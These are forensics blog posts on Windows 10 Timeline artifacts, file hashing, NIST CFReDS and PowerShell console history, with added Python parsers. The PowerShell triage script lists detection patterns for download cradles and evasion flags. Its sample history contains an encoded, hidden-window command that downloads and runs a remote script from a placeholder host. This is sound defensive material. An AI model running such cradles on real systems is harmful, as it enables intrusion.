Monday, April 29, 2019

Windows 10 Timeline Feature


There is a feature in updated versions of Windows 10 called "Timeline".
What might you think a feature with this name would do?

Could you call it something like a browser history, but a history of the user's activity on the entire computer?
MS might have dropped this one right in the laps of forensicators.

Apart from websites that you visited, the Timeline shows the documents you worked with, the games you played, the images you viewed or created and recently executed applications.


Access the Timeline feature through the Task View icon on the taskbar, just to the right of the Windows Start button and search box.


"WINDOWS KEY + Tab" will also take you there.

Additional details about Timeline
Here's some additional information you need to know as you get started with Timeline on Windows 10:

  • Timeline works only on devices running the Windows 10 April 2018 Update (version 1803) and later.
  • Timeline works on every edition of Windows 10; syncing activities across devices requires signing in with a Microsoft account.
  • Office applications appear in your timeline, but only after you save the document (or if AutoSave is enabled).
  • You can't control which applications appear in your timeline.
  • You can't check your timeline on the web, but you can view your activities in the privacy dashboard of your Microsoft account.
  • You can't change the number of days that Timeline keeps on your device: 4 days locally, or 30 days if the sync option is enabled.
  • Timeline is supported on a multi-monitor setup, but it will only appear on the display from which you invoked it.


The feature can be enabled and configured in "Settings --> Privacy --> Activity History"



***FOR FORENSIC PURPOSES


This is pitched as an "organization" and "productivity" feature, but it doubles as a built-in forensics source for us.

TIMELINE FEATURE DATABASE FILE:
Located at:


C:\Users\<Username>\AppData\Local\ConnectedDevicesPlatform\L.<Username>\ActivitiesCache.db


This file, "ActivitiesCache.db", is a SQLite database and is well worth parsing and capturing as a forensic artifact. Two practical notes: the folder name (L.<Username> here) can differ depending on the account type, so check the ConnectedDevicesPlatform directory listing on the box rather than assuming it, and copy the database (together with any -wal and -shm files beside it) off the live system before parsing, since the live file is held open and the most recent activity may still be sitting in the write-ahead log.



Can be viewed in FTK, or in any SQLite browser, since it is a SQLite database.




OR



Or use WxTCmd, the Windows 10 Timeline parser written by DFIR rockstar and tool author Eric Zimmerman.

WxTCmd
Windows 10 Timeline database parser

https://cyberforensicator.com/2018/05/08/wxtcmd-windows-10-timeline-parser/
https://binaryforay.blogspot.com/2018/05/introducing-wxtcmd.html
https://ericzimmerman.github.io/#!index.md


  1. Run WxTCmd.exe against a copy of the ActivitiesCache.db file:
.\WxTCmd.exe -f C:\Users\Win10\AppData\Local\ConnectedDevicesPlatform\L.Win10\ActivitiesCache.db --csv C:\Users\Win10\Desktop\


  2. Take the output file (CSV, or a TSV tab-separated file with older tool versions) and open it with Timeline Explorer (another of Zimmerman's finest):
File --> Open --> path to the output file


Timeline Explorer will show the last-modified time, the executable that ran, the display text, and the content info for each activity.
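If you would rather look at the database directly (for example, to script the collection across many hosts), the script below opens ActivitiesCache.db with Python's built-in sqlite3 module, pulls the AppId, timestamp and Payload columns from the Activity table, and normalizes them into a sorted event list. It is an added example, not code from this post or from WxTCmd. The column names, the JSON shape of AppId and Payload, and the meaning assigned to ActivityType values 5 and 6 are assumptions drawn from how the database is commonly described, so check them against ".schema Activity" on your own copy; the rows it runs against are constructed inline so it works offline.

```python
import json
import sqlite3
from datetime import datetime, timezone

# Subset of the Activity table in ActivitiesCache.db. Column names are an
# assumption based on how the database is commonly described; verify them
# against ".schema Activity" on your own copy before relying on this.
SCHEMA = """
CREATE TABLE Activity (
    Id               BLOB PRIMARY KEY,
    AppId            TEXT,
    ActivityType     INTEGER,
    StartTime        INTEGER,
    EndTime          INTEGER,
    LastModifiedTime INTEGER,
    Payload          BLOB
);
"""

# Assumed meaning of the two most common ActivityType values.
ACTIVITY_TYPES = {5: "app/file opened", 6: "app in focus"}


def to_utc(epoch_seconds):
    """Timestamps in the table are Unix epoch seconds; 0/None means 'not set'."""
    if not epoch_seconds:
        return None
    return datetime.fromtimestamp(epoch_seconds, tz=timezone.utc).isoformat()


def app_from_appid(appid_json):
    """AppId is a JSON list of {application, platform}; prefer the on-disk path."""
    try:
        entries = json.loads(appid_json or "[]")
    except json.JSONDecodeError:
        return appid_json  # keep the raw value rather than losing the row
    for entry in entries:
        if entry.get("platform") == "x_exe_path":
            return entry.get("application")
    return entries[0].get("application") if entries else None


def parse_activities(con):
    """Return the Activity rows as a list of dicts, oldest first."""
    cur = con.execute(
        "SELECT AppId, ActivityType, StartTime, EndTime, LastModifiedTime, Payload "
        "FROM Activity ORDER BY StartTime, ActivityType"
    )
    events = []
    for app_id, act_type, start, end, modified, payload in cur:
        try:  # Payload is a JSON blob; displayText/contentUri name the file opened
            payload_obj = json.loads(payload.decode("utf-8", "replace")) if payload else {}
        except json.JSONDecodeError:
            payload_obj = {}
        events.append({
            "start": to_utc(start),
            "end": to_utc(end),
            "last_modified": to_utc(modified),
            "type": ACTIVITY_TYPES.get(act_type, f"type {act_type}"),
            "app": app_from_appid(app_id),
            "display": payload_obj.get("displayText"),
            "content": payload_obj.get("contentUri"),
        })
    return events


def load_copy(path):
    """Open a copied ActivitiesCache.db read-only (never the live file)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample_db():
    """Constructed sample rows (not from a real system) so the script runs offline."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)

    def appid(path):
        return json.dumps([{"application": path, "platform": "x_exe_path"}])

    def payload(text, uri=None):
        return json.dumps({"displayText": text, "contentUri": uri}).encode()

    rows = [
        (b"\x01", appid(r"C:\Windows\System32\notepad.exe"), 5,
         1556521200, 1556521500, 1556521500,
         payload("notes.txt", "file:///C:/Users/Win10/Desktop/notes.txt")),
        (b"\x02", appid(r"C:\Windows\System32\notepad.exe"), 6,
         1556521200, 1556521500, 1556521500, None),
        (b"\x03", appid(r"C:\Program Files\7-Zip\7zFM.exe"), 5,
         1556524800, 0, 1556524800, payload("7-Zip File Manager")),
    ]
    con.executemany("INSERT INTO Activity VALUES (?,?,?,?,?,?,?)", rows)
    return con


if __name__ == "__main__":
    for ev in parse_activities(build_sample_db()):
        print(ev["start"], ev["type"], ev["app"], ev["display"] or "")
```

For a real collection, swap build_sample_db() for load_copy(r"path\to\copied\ActivitiesCache.db"); the read-only URI keeps the script from ever writing to the evidence copy.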




The database is also a possible source of recent Microsoft Edge browser activity.





In Conclusion:

The Windows 10 Timeline feature is a good one for us forensicators to know. The location and presence of the ActivitiesCache.db file can be well worth our while for recently used applications and files with timestamps, and for recent Edge browser history via the Timeline feature.
Big thanks to Eric Zimmerman for the never ending inspiration and awesome tools he provides the community.


--Bryan



RESOURCE
Microsoft. "Get Help with Timeline." Support.microsoft.com, support.microsoft.com/en-us/help/4230676/windows-10-get-help-with-timeline.


Thursday, April 25, 2019

Ways to Hash a File


So, you have begun your incident response and, for documentation purposes, you need to record the hashes of files. Or you have imaged some media, perhaps memory, and you want the hashes of the image files.

In this post, I will outline a few ways to do so with some tools native to Windows and some non-native tools.

___________________________________________________________________________
1. PowerShell (Get-FileHash)

Get-FileHash

Get-FileHash [-Path] <string[]> [-Algorithm {SHA1 | SHA256 | SHA384 | SHA512 | MACTripleDES | MD5 | RIPEMD160}]


*Note
- If -Algorithm is omitted, the default is SHA256.
- -Algorithm can be abbreviated (e.g., -al), since PowerShell accepts any unambiguous prefix of a parameter name.
- A semicolon (;) joins two commands on one line.
- -Path accepts wildcards and multiple paths, so one command can hash a whole set of image segments.
- MACTripleDES and RIPEMD160 are only available in Windows PowerShell 5.1; PowerShell 6 and later dropped them.


Example:

Get-FileHash .\hash_this.txt -al MD5; Get-FileHash .\hash_this.txt -al SHA1

The above command hashes "hash_this.txt" with the MD5 and SHA1 algorithms.









___________________________________________________________________________ 

2. Certutil (-hashfile)

Example:
certutil -hashfile <FILENAME> <HASH ALGORITHM>

certutil -hashfile hash_this.txt MD5

The above command hashes "hash_this.txt" with MD5.

*Note
- Supported algorithm names are MD2, MD4, MD5, SHA1, SHA256, SHA384 and SHA512; if you omit the algorithm, certutil defaults to SHA1.
- Older Windows builds print the digest with a space between each byte pair; strip the spaces before comparing against a hash produced by another tool.











___________________________________________________________________________

3. md5deep and sha1deep

In your incident response kit, it would be a good idea to have a subset of tools for hashing. md5deep, hashdeep, and sha1deep are some possible options.

Link to download of md5deep:


Example: md5deep64.exe <FILENAME>


*Note

There are also sha1deep, sha256deep, and a few other algorithm-specific hashing exes in the same download that work the same way as md5deep. Two switches worth knowing: -r hashes a directory tree recursively, and hashdeep can audit a set of files against a previously saved hash list (-a with -k <known hashes file>), which is how you show that nothing changed between collection and analysis.





 ___________________________________________________________________________
4. Hashing with macOS and Linux

For macOS:
Open a terminal and use the command md5, shasum, or shasum -a 256 with the path to the file to return a file hash.

Example:
md5 <FILEPATH>
md5 -r <FILEPATH>            (reversed output: hash first, then filename, like md5sum)
openssl md5 <FILEPATH>
shasum -a 256 <FILEPATH>


For Linux:
Open a terminal and use the command md5sum, sha1sum, or sha256sum with the path to the file to return a file hash.

Example:
md5sum <FILEPATH>
sha1sum <FILEPATH>
sha256sum <FILEPATH>
sha256sum <FILEPATH> > hashes.txt ; sha256sum -c hashes.txt      (save the hashes, then verify them later)
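Whatever tool you pick from the four sections above, two things matter more than the tool: hashing a multi-gigabyte image without reading it into memory, and being able to prove later that the file you analyzed is the one you collected. The Python script below, an added example rather than code from this post or from any of the tools above, does both: a single streaming pass computes MD5, SHA1 and SHA256 at once, writes a sha256sum-compatible manifest, and re-verifies it after a simulated modification. The file names and contents are constructed inline so it runs offline.

```python
import hashlib
import os
import tempfile

CHUNK = 1024 * 1024  # read 1 MiB at a time so multi-GB images never sit in RAM


def hash_file(path, algorithms=("md5", "sha1", "sha256")):
    """One pass over the file, feeding every requested digest at the same time."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def write_manifest(paths, manifest_path, algorithm="sha256"):
    """Write '<hex>  <path>' lines: the shape sha256sum -c / shasum -c accept."""
    with open(manifest_path, "w", encoding="utf-8") as out:
        for path in paths:
            out.write(f"{hash_file(path, (algorithm,))[algorithm]}  {path}\n")


def verify_manifest(manifest_path, algorithm="sha256"):
    """Re-hash every listed file; returns {basename: 'OK' | 'FAILED' | 'MISSING'}."""
    results = {}
    with open(manifest_path, encoding="utf-8") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if not line:
                continue
            expected, path = line.split("  ", 1)
            name = os.path.basename(path)
            if not os.path.isfile(path):
                results[name] = "MISSING"
                continue
            actual = hash_file(path, (algorithm,))[algorithm]
            results[name] = "OK" if actual == expected else "FAILED"
    return results


def demo():
    """Constructed sample files in a temp dir (not real evidence): hash, record, tamper, re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        small = os.path.join(tmp, "hash_this.txt")
        image = os.path.join(tmp, "memory.raw")
        with open(small, "wb") as fh:
            fh.write(b"abc")
        with open(image, "wb") as fh:
            fh.write(os.urandom(3 * CHUNK + 17))  # spans several read chunks
        manifest = os.path.join(tmp, "hashes.sha256")
        write_manifest([small, image], manifest)
        before = verify_manifest(manifest)
        with open(image, "ab") as fh:
            fh.write(b"\x00")  # one appended byte: "the image changed after collection"
        after = verify_manifest(manifest)
        return hash_file(small), before, after


if __name__ == "__main__":
    digests, before, after = demo()
    for name, value in digests.items():
        print(f"{name:7} {value}")
    print("before tamper:", before)
    print("after tamper: ", after)
```

The manifest format is deliberately the one the coreutils tools read, so a colleague on Linux can check your Windows-collected images with plain sha256sum -c.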

___________________________________________________________________________



In conclusion, these are only a few ways to hash a file. There are several more.

There are also some 3rd-party options: "HashTab", which adds a tab in a file's Properties dialog that shows its hashes, as well as "Hash Generator" and NirSoft's "HashMyFiles" tool.

And most forensics tools include a hashing feature.

One caveat whichever tool you use: MD5 and SHA1 both have practical collision attacks, so while they are fine for spotting accidental change, record a SHA256 alongside them when the hash may later have to stand up as proof of integrity.

But for an on-the-fly way, do remember that there are some command-line methods at your helm.

Tuesday, April 23, 2019

NIST CFReDS Project


The National Institute of Standards and Technology (NIST) developed the Computer Forensic Reference Data Sets (CFReDS) for testing tools and for training.

https://www.cfreds.nist.gov/

The site is made up of data sets and forensic images for simulating cases and testing forensic tools.
Included are questions and cases based on themed scenarios.
Be forewarned that some of the data sets are a little dated, e.g., timestamps from 2004.

There is one case in particular that I like, the data leakage case, found at:
https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html

This case has a reasonably creative narrative of a scenario related to the leaking of sensitive information.  The images were taken from a Windows 7 machine, so more recent than 2004.  And there are three different removable media types with different file systems to practice with.

This particular NIST project laid out some nice practice points for forensics too, which hit some of the main themes of the field.
Included are:

Practice Point: Understanding Types of Data Leakage
- Storage devices
      > HDD (Hard Disk Drive), SSD (Solid State Drive)
      > USB flash drive, flash memory cards
      > CD/DVD (with optical disk drive)
- Network transmission
      > File sharing, Remote Desktop Connection
      > E-mail, SNS (Social Network Service)
      > Cloud services, messenger

Practice Point: Windows Forensics
- Windows event logs
- Opened files and directories
- Application (executable) usage history
- CD/DVD burning records
- External devices attached to PC
- Network drive connection traces
- System caches
- Windows Search databases
- Volume Shadow Copy

Practice Point: File System Forensics
- FAT, NTFS, UDF
- Metadata (NTFS MFT, FAT directory entry)
- Timestamps
- Transaction logs (NTFS)

Practice Point: Web Browser Forensics
- History, cache, cookies
- Internet usage history (URLs, search keywords...)

Practice Point: E-mail Forensics
- MS Outlook file examination
- E-mails and attachments

Practice Point: Database Forensics
- MS Extensible Storage Engine (ESE) database
- SQLite database

Practice Point: Deleted Data Recovery
- Metadata-based recovery
- Signature & content-based recovery (aka carving)
- Recycle Bin of Windows
- Unused area examination

Practice Point: User Behavior Analysis
- Constructing a forensic timeline of events
- Visualizing the timeline

There have been recent developments and new trending themes in the field, but for those starting off and wanting to test out forensic examination tools, this could prove to be a valuable resource.

Other options include imaging your own media, or a friend's (with their consent), which can be fun to test.
Another option would be to go to a garage sale or eBay to buy old storage drives and see what you can find. Resumes, tax returns, movies... etc. Piece together your own scenario.

But for a free option, the CFReDS project is not a bad place to start.
I plan to cover an open source option, Autopsy, to test out the exercises from this site and show it here in the future.


Reference:
NIST. "The CFReDS Project." www.cfreds.nist.gov/

NIST. "Data Leakage Case." www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html

Monday, April 22, 2019

See Recent Typed Powershell Commands

The Powershell ConsoleHost_history file

Windows PowerShell has become a beast of a command-line tool that is more and more useful for configuration, automation, forensics, penetration testing, etc.

PowerShell 1.0 was first released on November 14, 2006 (for Windows XP, Server 2003 and Vista); Windows 7 was the first Windows version to ship with it built in (PowerShell 2.0).

There are some very nice commands that can be run with PowerShell that return potentially valuable forensic information, such as:
PS C:\> Get-Process   --returns running processes
PS C:\> Get-NetTCPConnection -State Established    --returns established network connections
PS C:\> Get-ADUser <Identity>     --returns information about a domain user (requires the ActiveDirectory module from RSAT)

I will cover Powershell and useful commands more in depth in future posts.

For this post I want to point out a potentially valuable text file located at:

 "%APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"


View this text file to see a history of PowerShell commands typed into the console. A few caveats are worth knowing before you rely on it:
- It is written by the PSReadLine module, so it only exists for users who ran an interactive console with PSReadLine loaded (the default on Windows 10 / PowerShell 5.0 and later). The ISE, and anything run non-interactively (e.g., powershell.exe -Command or -EncodedCommand from a scheduled task or another process), leaves nothing here.
- It lives under each user's %APPDATA%, so there is one file per user profile; collect all of them.
- It records what was typed, not what succeeded, so failed or mistyped attempts show up too.
- It is trivial to tamper with: Set-PSReadLineOption -HistorySaveStyle SaveNothing stops logging, and the file can simply be deleted. (Get-PSReadLineOption).HistorySavePath shows the location actually in use.

This text file, along with the PowerShell event logs (module and script block logging), gives insight into which PowerShell commands were run on a box, and potentially by which user, including commands that were attempted from the console and failed.
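Reading ConsoleHost_history.txt by eye works for one host; across many hosts it helps to script the first pass. The Python below is an added example, not code from this post, that triages a history file for the things a responder looks for: -EncodedCommand payloads (which it decodes, since they are base64 over UTF-16LE text), download cradles, hidden-window and no-profile flags, and commands that disable or clear the history itself. The sample history is constructed inline (the URL in it is a placeholder), and the regex list is a starting point rather than a complete signature set.

```python
import base64
import re

# Heuristics a responder would look for in ConsoleHost_history.txt. These are
# starting points, not a complete signature set.
PATTERNS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
        r"Start-BitsTransfer|Invoke-Expression|\bIEX\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "evasion_flags": re.compile(
        r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile|-noni\b", re.I),
    "history_tampering": re.compile(
        r"HistorySaveStyle\s+SaveNothing|Clear-History|ConsoleHost_history", re.I),
}
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script):
    """What -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse of encode_command; returns None if the blob is not a valid payload."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def tag_line(text):
    """Names of every pattern that matches the given command text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))


def triage(history_text):
    """Return one finding per suspicious line: line number, command, tags, decoded payload."""
    findings = []
    for line_no, raw in enumerate(history_text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        tags = set(tag_line(line))
        decoded = None
        match = ENCODED.search(line)
        if match:
            tags.add("encoded_command")
            decoded = decode_command(match.group(1))
            if decoded:  # scan the decoded script too: that is where the cradle hides
                tags.update(tag_line(decoded))
        if tags:
            findings.append({"line": line_no, "command": line,
                             "tags": sorted(tags), "decoded": decoded})
    return findings


def sample_history():
    """Constructed sample history (not from a real host); the URL is a placeholder."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a.ps1')"
    return "\n".join([
        "Get-Process",
        "Get-NetTCPConnection -State Established",
        f"powershell -nop -w hidden -enc {encode_command(cradle)}",
        "Set-PSReadLineOption -HistorySaveStyle SaveNothing",
        "Get-ChildItem C:\\Users",
    ])


if __name__ == "__main__":
    for f in triage(sample_history()):
        print(f"line {f['line']}: {', '.join(f['tags'])}")
        print("   ", f["command"][:80])
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Point triage() at the contents of each user's history file (open it with encoding="utf-8-sig"; PSReadLine may write a BOM) and review the flagged lines first, then read the rest in order, since the benign-looking lines around a finding are usually what tell you what the operator was after.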

--Bryan

Saturday, April 20, 2019

First blog post


Greetings!

This is my first blog post.  I suppose an introduction is in order. 
My name is Bryan Ambrose.  I am a Digital Forensics (DF) and Cyber Security enthusiast.
Former Network Defense and Incident Response analyst, and now a current instructor.
I claim NOT to know everything. Nor am I a self-described expert in the vast components that make up this wonderful field of Digital Forensics.
But I sure do embrace a passion for discovery and learning in this fun DF field.

I have over 10 years of IT experience and 5 years in Digital Forensics.  Former active duty Information Systems Technician and current Reservist.
I have worked in digital media analysis and examiner positions for both DoD and DHS.
I have completed a Master's degree in Digital Forensics and Cyber Investigations.
I currently hold OSCP, C|EH, CompTIA Security+, and DoD certified Media Collector and Forensics Examiner.
I am also certified with EnCase, Splunk, and various other tools.

Enough of me, let's get to the fun stuff.

This blog is intended to document and journal findings of interesting tidbits that I have collected along the way.
I am not necessarily saying that what I post on here will be new, but rather things I thought were neat and relevant to the Digital Forensics and Incident Response (DFIR) field.
I will be showcasing tools and methods/procedures that I have used to find data in the investigations I have seen, and methods that could potentially be valuable for future cases.
A big theme of DF, and if you are an honest adult, is integrity.  That being so, I will try to give credit where it is due, and do my best to properly cite and document my sources.

The site is called DataDigitally and the goal is to be a contributing DFIR member.  This blog is a way for me to give back to the community that has given so much to me and never ceases to impress me.

Keep on forensicating.  

--Bryan Ambrose
Bryan.w.ambrose@gmail.com
Me with a cup of joe

Current at home office setup (2019).